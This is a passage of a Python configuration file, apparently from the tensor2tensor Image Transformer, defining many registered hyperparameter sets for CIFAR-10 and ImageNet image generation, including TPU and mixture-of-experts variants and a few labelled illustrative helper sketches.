hparams.add_hparam("gap_sizes", [2, 4, 8, 16, 32, 64, 2, 4, 8, 16, 32, 64])
# image size related flags
# assuming that the image has same height and width
hparams.add_hparam("img_len", 32)
hparams.add_hparam("num_channels", 3)
# Local attention params
hparams.add_hparam("local_and_global_att", False)
hparams.add_hparam("block_length", 256)
hparams.add_hparam("block_width", 128)
hparams.add_hparam("num_encoder_layers", 4)
hparams.add_hparam("num_decoder_layers", 12)
hparams.add_hparam("dec_attention_type", cia.AttentionType.LOCAL_1D)
hparams.add_hparam("block_raster_scan", False)
# multipos attention params
hparams.add_hparam("q_filter_width", 1)
hparams.add_hparam("kv_filter_width", 1)
hparams.add_hparam("likelihood", cia.DistributionType.CAT)
hparams.add_hparam("unconditional", False) # unconditional generation
# parameters of discretized mixture of logistics loss from pixel cnn++
hparams.add_hparam("num_mixtures", 10)
# These parameters are only used when ffn_layer=="local_moe_tpu"
hparams.add_hparam("moe_overhead_train", 1.0)
hparams.add_hparam("moe_overhead_eval", 2.0)
hparams.moe_num_experts = 8
hparams.moe_loss_coef = 1e-3
# These parameters are for relative attention
hparams.add_hparam("shared_rel", False) # share relative embeddings
return hparams
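# Illustrative sketch (hypothetical configuration, not part of the original
# file): new hparams sets in this file are built by copying an existing one
# and overriding a few fields, as below. The name and values are made up.
@registry.register_hparams
def image_transformer_base_small_sketch():
  """Hypothetical smaller variant for quick experiments."""
  hparams = image_transformer_base()
  hparams.hidden_size = 256
  hparams.filter_size = 1024
  hparams.num_decoder_layers = 6
  return hparams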
@registry.register_hparams
def imagetransformer_base():
hparams = image_transformer_base()
return hparams
@registry.register_hparams
def imagetransformer_cifar10_base():
"""Best config for 2.90 bits/dim on CIFAR10 using cross entropy."""
hparams = image_transformer_base()
hparams.batch_size = 4
hparams.num_heads = 4
hparams.num_decoder_layers = 12
hparams.block_length = 256
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.5
hparams.learning_rate_warmup_steps = 4000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_cifar10_base_dmol():
"""Best config for 2.90 bits/dim on CIFAR10 using DMOL."""
hparams = image_transformer_base()
hparams.likelihood = cia.DistributionType.DMOL
hparams.num_channels = 1
hparams.bottom["targets"] = modalities.image_channel_compress_targets_bottom
hparams.top["targets"] = modalities.identity_top
hparams.num_heads = 8
hparams.batch_size = 8
hparams.sampling_method = "random"
hparams.layer_preprocess_sequence = "n"
hparams.layer_postprocess_sequence = "da"
hparams.summarize_grads = True
hparams.hidden_size = 256
hparams.filter_size = 512
hparams.attention_key_channels = 512
hparams.attention_value_channels = 512
hparams.num_decoder_layers = 12
hparams.layer_prepostprocess_dropout = 0.1
hparams.learning_rate = 0.1
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.pos = "emb"
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_base_tpu():
"""Transformer base params for cifar-10."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.2
hparams.learning_rate_warmup_steps = 6000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_base_imagenet_tpu():
"""Transformer base params for cifar-10."""
hparams = imagetransformer_base_tpu()
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_imagenet32_base():
"""Best config for ImageNet-32 with 3.77 bits/dim using cross entropy."""
hparams = imagetransformer_cifar10_base()
hparams.batch_size = 4
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_base_rel():
"""Base with relative attention."""
hparams = imagetransformer_base()
hparams.dec_attention_type = cia.AttentionType.RELATIVE_LOCAL_1D
return hparams
@registry.register_hparams
def imagetransformer_sep_channels():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.num_heads = 4
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 256
hparams.filter_size = 512
hparams.num_hidden_layers = 6
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.num_heads = 4
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 256
hparams.filter_size = 256
hparams.num_hidden_layers = 8
hparams.sampling_method = "random"
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l_multipos3():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l()
hparams.q_filter_width = 3
hparams.kv_filter_width = 3
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan():
"""big 1d model for conditional image generation.2.99 on cifar10."""
hparams = imagetransformer_sep_channels_8l()
hparams.block_width = 256
hparams.block_length = 256
hparams.hidden_size = 512
hparams.num_heads = 8
hparams.filter_size = 2048
hparams.batch_size = 4
hparams.max_length = 3075
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.num_decoder_layers = 8
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_base_10l_8h_big_uncond_dr03_dan_64():
"""big 1d model for unconditional generation on imagenet."""
hparams = imagetransformer_base_10l_8h_big_cond_dr03_dan()
hparams.unconditional = True
hparams.max_length = 14000
hparams.batch_size = 1
hparams.img_len = 64
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformerpp_sep_channels_8l_8h():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.likelihood = cia.DistributionType.DMOL
hparams.num_channels = 1
hparams.bottom["targets"] = modalities.image_channel_compress_targets_bottom
hparams.top["targets"] = modalities.identity_top
hparams.num_heads = 8
hparams.batch_size = 4
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 512
hparams.filter_size = 512
hparams.num_hidden_layers = 8
hparams.sampling_method = "random"
hparams.layer_preprocess_sequence = "n"
hparams.layer_postprocess_sequence = "da"
hparams.summarize_grads = True
hparams.learning_rate = 0.1
return hparams
@registry.register_hparams
def imagetransformerpp_base_8l_8h_big_cond_dr03_dan():
"""big 1d model for conditional image generation.2.99 on cifar10."""
hparams = imagetransformerpp_sep_channels_8l_8h()
hparams.hidden_size = 512
hparams.num_heads = 8
hparams.filter_size = 2048
hparams.batch_size = 4
hparams.max_length = 3075
hparams.layer_prepostprocess_dropout = 0.3
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.summarize_grads = True
hparams.learning_rate = 0.01
return hparams
@registry.register_hparams
def imagetransformerpp_base_8l_8h_big_cond_dr03_dan_a():
hparams = imagetransformerpp_base_8l_8h_big_cond_dr03_dan()
hparams.learning_rate = 0.1
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan():
hparams = imagetransformerpp_base_8l_8h_big_cond_dr03_dan_a()
hparams.unconditional = True
hparams.num_decoder_layers = 10
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_a():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan()
hparams.learning_rate = 0.01
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_b():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan()
hparams.learning_rate = 0.1
hparams.hidden_size = 256
hparams.attention_key_channels = 512
hparams.attention_value_channels = 512
hparams.filter_size = 1024
return hparams
@registry.register_hparams
def imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_b()
hparams.filter_size = 512
hparams.layer_prepostprocess_dropout = 0.1
hparams.learning_rate = 0.1
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.pos = "emb"
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_k():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g()
hparams.num_decoder_layers = 12
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_l():
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g()
hparams.num_decoder_layers = 12
hparams.clip_grad_norm = 40.
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m():
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_k()
hparams.batch_size = 8
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_rel():
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_k()
hparams.batch_size = 8
hparams.dec_attention_type = cia.AttentionType.RELATIVE_LOCAL_1D
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_relsh():
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_rel()
hparams.shared_rel = True
return hparams
@registry.register_hparams
def imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_p():
"""Gets to 2.92 in just under 4 days on 8 p100s."""
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_l()
hparams.num_decoder_layers = 14
hparams.batch_size = 8
hparams.layer_prepostprocess_dropout = 0.2
return hparams
@registry.register_hparams
def imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m_bs1():
"""For 128x128."""
# TODO(trandustin): why are these running? max_length and img_len not set
# 256x256 was also training without setting max_length
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_m()
hparams.batch_size = 1
return hparams
@registry.register_hparams
def imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_p_bs1():
"""For 128x128."""
hparams = imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_p()
hparams.batch_size = 1
return hparams
@registry.register_hparams
def imagetransformerpp_base_5l_8h_big_uncond_dr00_dan_g_bs1():
"""For 256x256."""
hparams = imagetransformerpp_base_10l_8h_big_uncond_dr03_dan_g()
# TODO(trandustin): I forgot to set this in the runs! Maybe it's not used in
# image transformer training implementation?
# hparams.img_len = 256
hparams.max_length = 66000 # allow for 256x256
hparams.batch_size = 1
hparams.num_decoder_layers = 5
hparams.hidden_size = 128
hparams.filter_size = 128
hparams.attention_key_channels = 64
hparams.attention_value_channels = 64
hparams.layer_prepostprocess_dropout = 0.0
return hparams
@registry.register_hparams
def imagetransformerpp_base_5l_8h_dr00_dan_g_bs1_adafactor():
"""For 256x256."""
hparams = imagetransformerpp_base_5l_8h_big_uncond_dr00_dan_g_bs1()
# Use Adafactor which uses less memory than Adam, and its recommendations.
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
return hparams
@registry.register_hparams
def imagetransformerpp_base_6l_8h_dr00_dan_g_bs1_adafactor():
"""For 256x256."""
hparams = imagetransformerpp_base_5l_8h_dr00_dan_g_bs1_adafactor()
hparams.num_decoder_layers = 6
return hparams
@registry.register_hparams
def imagetransformerpp_base_14l_8h_big_uncond_dr03_dan_eval():
"""Gets to 2.92 in just under 4 days on 8 p100s."""
hparams = imagetransformerpp_base_12l_8h_big_uncond_dr03_dan_l()
hparams.num_decoder_layers = 14
hparams.batch_size = 8
# hparams.layer_prepostprocess_dropout = 0.2
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_128():
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan()
hparams.block_width = 128
hparams.block_length = 128
return hparams
@registry.register_hparams
def imagetransformer_base_10l_8h_big_cond_dr03_dan():
"""Best conditional Cifar10 gen param."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan()
hparams.num_decoder_layers = 10
return hparams
@registry.register_hparams
def imagetransformer_base_10l_8h_big_uncond_dr03_dan():
"""Best unconditional Cifar10 gen param."""
hparams = imagetransformer_base_10l_8h_big_cond_dr03_dan()
hparams.num_decoder_layers = 10
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan()
hparams.gap_sizes = [0, 16, 64, 0, 16, 64, 128, 0]
hparams.dec_attention_type = cia.AttentionType.DILATED
hparams.block_length = 128
hparams.block_width = 128
hparams.add_hparam("num_memory_blocks", 1)
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated_b():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated()
hparams.block_width = 64
hparams.num_memory_blocks = 2
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated_c():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated()
hparams.block_width = 32
hparams.num_memory_blocks = 4
return hparams
@registry.register_hparams
def imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated_d():
"""Dilated hparams."""
hparams = imagetransformer_base_8l_8h_big_cond_dr03_dan_dilated()
hparams.gap_sizes = [0, 16, 64, 16, 64, 128, 256, 0]
return hparams
@registry.register_hparams
def imagetransformer_base_12l_8h_big():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_sep_channels_8l_8h()
hparams.filter_size = 1024
hparams.num_decoder_layers = 12
hparams.batch_size = 1
hparams.hidden_size = 512
hparams.learning_rate_warmup_steps = 4000
hparams.sampling_method = "random"
hparams.beam_size = 1
hparams.block_width = 256
return hparams
@registry.register_hparams
def imagetransformer1d_base_8l_64by64():
"""hparams fo 12 layer big 1d model for imagenet 64x64."""
hparams = image_transformer_base()
hparams.num_heads = 8
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.num_decoder_layers = 8
hparams.batch_size = 1
hparams.block_length = 512
hparams.block_width = 768
hparams.layer_prepostprocess_dropout = 0.1
hparams.max_length = 14000
hparams.unconditional = int(False)
return hparams
@registry.register_hparams
def imagetransformer1d_base_12l_64by64():
"""hparams fo 12 layer big 1d model for imagenet 64x64."""
hparams = image_transformer_base()
hparams.num_heads = 8
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.num_decoder_layers = 12
hparams.batch_size = 1
hparams.block_length = 512
hparams.block_width = 768
hparams.layer_prepostprocess_dropout = 0.1
hparams.max_length = 14000
hparams.unconditional = int(False)
return hparams
@registry.register_hparams
def imagetransformer_base_14l_8h_big():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_12l_8h_big()
hparams.num_decoder_layers = 14
return hparams
@registry.register_hparams
def imagetransformer_base_14l_8h_big_dr01():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big()
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_base_12l_8h_big_uncond():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_12l_8h_big()
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_base_14l_8h_big_uncond():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_12l_8h_big_uncond()
hparams.num_decoder_layers = 14
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_12l_16h_imagenet_large():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l_8h()
hparams.num_hidden_layers = 12
hparams.batch_size = 1
hparams.filter_size = 2048
hparams.num_heads = 16
hparams.learning_rate_warmup_steps = 16000
hparams.sampling_method = "random"
hparams.learning_rate = 0.1
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_16l_16h_imgnet_lrg_loc():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_12l_16h_imagenet_large()
hparams.num_hidden_layers = 16
hparams.local_attention = True
hparams.batch_size = 1
hparams.block_length = 256
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_16l_16h_imgnet_lrg_loc_128():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_12l_16h_imagenet_large()
hparams.num_hidden_layers = 16
hparams.local_attention = True
hparams.batch_size = 1
hparams.block_length = 128
return hparams
@registry.register_hparams
def imagetransformer_sep_output_channels_8l_local_and_global_att():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l()
hparams.sampling_method = "random"
hparams.local_and_global_att = True
return hparams
@registry.register_hparams
def imagetransformer_base_10l_16h_big_uncond_dr01_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big_dr01()
# num_hidden_layers
hparams.num_decoder_layers = 10
hparams.num_heads = 16
hparams.hidden_size = 1024
hparams.filter_size = 4096
hparams.batch_size = 1
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_base_10l_16h_big_dr01_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big_dr01()
# num_hidden_layers
hparams.num_decoder_layers = 10
hparams.num_heads = 16
hparams.hidden_size = 1024
hparams.filter_size = 4096
hparams.batch_size = 1
hparams.unconditional = False
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l_8h():
"""separate rgb embeddings."""
hparams = imagetransformer_base()
hparams.num_heads = 8
hparams.batch_size = 1
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 512
hparams.filter_size = 512
hparams.num_hidden_layers = 8
hparams.sampling_method = "random"
return hparams
@registry.register_hparams
def imagetransformer_sep_channels_8l_8h_local_and_global_att():
"""separate rgb embeddings."""
hparams = imagetransformer_sep_channels_8l_8h()
hparams.num_heads = 8
hparams.batch_size = 1
hparams.attention_key_channels = hparams.attention_value_channels = 0
hparams.hidden_size = 256
hparams.filter_size = 256
hparams.num_hidden_layers = 4
hparams.sampling_method = "random"
hparams.local_and_global_att = True
return hparams
@registry.register_hparams
def imagetransformer_bas8l_8h_big_uncond_dr03_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_14l_8h_big_dr01()
# num_hidden_layers
hparams.num_decoder_layers = 8
hparams.num_heads = 8
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_tiny():
hparams = imagetransformer_base()
hparams.num_decoder_layers = 2
hparams.hidden_size = 64
hparams.batch_size = 1
hparams.unconditional = True
hparams.max_length = 66000 # allow for 256x256
return hparams
@registry.register_hparams
def imagetransformerpp_tiny():
hparams = imagetransformer_tiny()
hparams.likelihood = cia.DistributionType.DMOL
hparams.num_channels = 1
hparams.bottom["targets"] = modalities.image_channel_compress_targets_bottom
hparams.top["targets"] = modalities.identity_top
return hparams
@registry.register_hparams
def imagetransformer_tiny_tpu():
hparams = imagetransformer_tiny()
update_hparams_for_tpu(hparams)
hparams.num_hidden_layers = 2
hparams.hidden_size = 16
hparams.batch_size = 2
hparams.num_heads = 2
return hparams
@registry.register_hparams
def imagetransformer_base_10l_16h_big_dr01_moe_imgnet():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_base_10l_16h_big_dr01_imgnet()
hparams.initializer = "orthogonal"
hparams.learning_rate_warmup_steps = 16000
hparams.add_hparam("moe_layers_decoder", "2,7") # Which layer is MoE.
hparams.moe_hidden_sizes = "4096" # Hidden layer sizes (comma-separated).
hparams.moe_num_experts = 64 # Number of experts in each MoE layer.
hparams.moe_k = 4 # How many experts to use per batch element (try 2 or 4).
hparams.moe_loss_coef = 3e-2 # MoE loss coefficient (1e-2 is usually ok).
hparams.scheduled_sampling_prob = 0.1
hparams.scheduled_sampling_warmup_steps = 200000
return hparams
@registry.register_hparams
def imagetransformer_moe_tiny():
"""Set of hyperparameters for a very small imagetransformer with MoE."""
hparams = imagetransformer_tiny()
hparams.hidden_size = 64
hparams.batch_size = 1
hparams.num_hidden_layers = 3
hparams.dec_attention_type = cia.AttentionType.MOE_LOCAL_1D
hparams.add_hparam("moe_layers_decoder", "1") # Which layer is MoE.
hparams.moe_hidden_sizes = "1024" # Hidden layer sizes (comma-separated).
hparams.moe_num_experts = 16 # Number of experts in each MoE layer.
hparams.moe_k = 2 # How many experts to use per batch element (try 2 or 4).
hparams.moe_loss_coef = 1e-2 # MoE loss coefficient (1e-2 is usually ok).
return hparams
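# Illustrative sketch, not part of tensor2tensor: the moe_num_experts and
# moe_k hparams above parameterize a top-k gating step in which each example
# is routed to its k highest-scoring experts and the selected gate values are
# renormalized. The helper below is a dependency-free stand-in for that idea;
# its name and simplifications are assumptions for illustration only.
def _topk_gating_sketch(expert_logits, k=2):
  """Return {expert_index: gate_weight} for the k highest-scoring experts."""
  import math
  top = sorted(range(len(expert_logits)),
               key=lambda i: expert_logits[i], reverse=True)[:k]
  weights = [math.exp(expert_logits[i]) for i in top]
  total = sum(weights)
  return {i: w / total for i, w in zip(top, weights)}
# Example: _topk_gating_sketch([0.1, 2.0, -1.0, 0.5], k=2) keeps experts 1 and 3.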
def update_hparams_for_tpu(hparams):
  """Adjust hparams for TPU training (Adafactor, rsqrt decay, small batch)."""
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
hparams.learning_rate_warmup_steps = 6000
hparams.batch_size = 4
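# Illustrative sketch, not part of tensor2tensor: every registered hparams
# function in this file follows the same pattern as update_hparams_for_tpu,
# i.e. start from a base configuration object and override a few fields in
# place. The stand-in below uses types.SimpleNamespace instead of the real
# HParams class; all names here are assumptions for illustration only.
def _hparams_override_sketch():
  import copy
  from types import SimpleNamespace
  base = SimpleNamespace(batch_size=1, num_heads=8, optimizer="adam",
                         learning_rate_warmup_steps=4000)
  tpu = copy.deepcopy(base)
  tpu.optimizer = "Adafactor"                  # mirrors update_hparams_for_tpu
  tpu.learning_rate_warmup_steps = 6000
  tpu.batch_size = 4
  tpu.num_heads = 4                            # heads are expensive on tpu
  return base, tpu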
@registry.register_hparams
def imagetransformer_sep_channels_8l_tpu():
"""Hparams for training imagetransformer on tpu."""
hparams = imagetransformer_sep_channels_8l()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.shared_embedding_and_softmax_weights = False
return hparams
@registry.register_hparams
def imagetransformer_b10l_4h_big_uncond_dr03_tpu():
"""Small model for tpu cifar 10."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 10
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 1024
hparams.learning_rate = 0.2
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
return hparams
@registry.register_hparams
def imagetransformer_b10l_dr03_moe_tpu():
"""Moe tpu params."""
hparams = imagetransformer_b10l_4h_big_uncond_dr03_tpu()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 10
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.ffn_layer = "local_moe_tpu"
return hparams
@registry.register_hparams
def imagetransformer_b10l_4h_big_uncond_dr03_lr025_tpu():
"""TPU related small model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 10
hparams.learning_rate = 0.25
hparams.learning_rate_warmup_steps = 8000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
# hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_big_uncond_dr03_tpu():
"""TPU 12 layer model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 1024
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_big_uncond_dr03_lr025_tpu():
hparams = imagetransformer_b12l_4h_big_uncond_dr03_tpu()
update_hparams_for_tpu(hparams)
hparams.learning_rate = 0.25
hparams.learning_rate_warmup_steps = 5000
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b256_uncond_dr03_tpu():
"""works very well on 4x4."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 256
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.5
hparams.learning_rate_warmup_steps = 4000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
hparams.unconditional = True
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b256_uncond_dr03_rel_tpu():
"""works very well on 4x4."""
hparams = imagetransformer_b12l_4h_b256_uncond_dr03_tpu()
hparams.shared_rel = True
hparams.dec_attention_type = cia.AttentionType.RELATIVE_LOCAL_1D
return hparams
@registry.register_ranged_hparams
def imagetransformer_cifar_tpu_range(rhp):
"""Range of hyperparameters for vizier."""
# After starting from base, set intervals for some parameters.
rhp.set_float("learning_rate", 0.01, 1.0, scale=rhp.LOG_SCALE)
rhp.set_discrete("num_decoder_layers", [8, 10, 12, 14, 16])
rhp.set_discrete("hidden_size", [256, 512, 1024])
rhp.set_discrete("block_length", [128, 256, 512])
rhp.set_categorical("dec_attention_type", [
cia.AttentionType.RELATIVE_LOCAL_1D, cia.AttentionType.LOCAL_1D])
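# Illustrative sketch, not part of tensor2tensor: imagetransformer_cifar_tpu_range
# above defines a search space for a tuner such as Vizier. A plain random-search
# stand-in over the same ranges could look like the helper below; its name, the
# sampling scheme, and the string stand-ins for the cia enum values are
# assumptions for illustration only.
def _sample_cifar_tpu_range_sketch(rng=None):
  import math
  import random
  rng = rng or random.Random(0)
  log_lr = rng.uniform(math.log(0.01), math.log(1.0))  # float on a log scale
  return {
      "learning_rate": math.exp(log_lr),
      "num_decoder_layers": rng.choice([8, 10, 12, 14, 16]),
      "hidden_size": rng.choice([256, 512, 1024]),
      "block_length": rng.choice([128, 256, 512]),
      "dec_attention_type": rng.choice(["relative_local_1d", "local_1d"]),
  }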
@registry.register_hparams
def imagetransformer_b12l_4h_b128_h512_uncond_dr03_tpu():
"""TPU related big model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.learning_rate = 0.2
hparams.learning_rate_warmup_steps = 6000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b128_h512_uncond_dr01_im():
"""TPU related imagenet model."""
hparams = imagetransformer_b12l_4h_b256_uncond_dr03_tpu()
update_hparams_for_tpu(hparams)
hparams.batch_size = 4
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
hparams.learning_rate_warmup_steps = 6000
hparams.layer_prepostprocess_dropout = 0.1
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_uncond_dr03_tpu():
"""TPU related small model."""
hparams = imagetransformer_b12l_4h_b256_uncond_dr03_tpu()
hparams.learning_rate = 0.2
hparams.learning_rate_warmup_steps = 4000
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b12l_4h_b128_uncond_dr03_tpu():
"""TPU config for cifar 10."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 2
hparams.num_heads = 4 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 128
hparams.hidden_size = 256
hparams.filter_size = 2048
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.1
hparams.optimizer = "Adafactor"
hparams.learning_rate_schedule = "rsqrt_decay"
hparams.learning_rate_warmup_steps = 10000
return hparams
@registry.register_hparams
def imagetransformer_b12l_8h_b256_uncond_dr03_tpu():
"""TPU related 12 layer 8 heads model."""
hparams = imagetransformer_bas8l_8h_big_uncond_dr03_imgnet()
update_hparams_for_tpu(hparams)
hparams.batch_size = 2
hparams.num_heads = 8 # heads are expensive on tpu
hparams.num_decoder_layers = 12
hparams.block_length = 256
hparams.hidden_size = 512
hparams.filter_size = 2048
hparams.layer_preprocess_sequence = "none"
hparams.layer_postprocess_sequence = "dan"
hparams.layer_prepostprocess_dropout = 0.3
return hparams
@registry.register_hparams
def imagetransformer_b10l_4h_big_uncond_dr01_tpu():
"""big 1d model for conditional image generation."""
hparams = imagetransformer_b12l_4h_big_uncond_dr03_tpu()
# num_hidden_layers
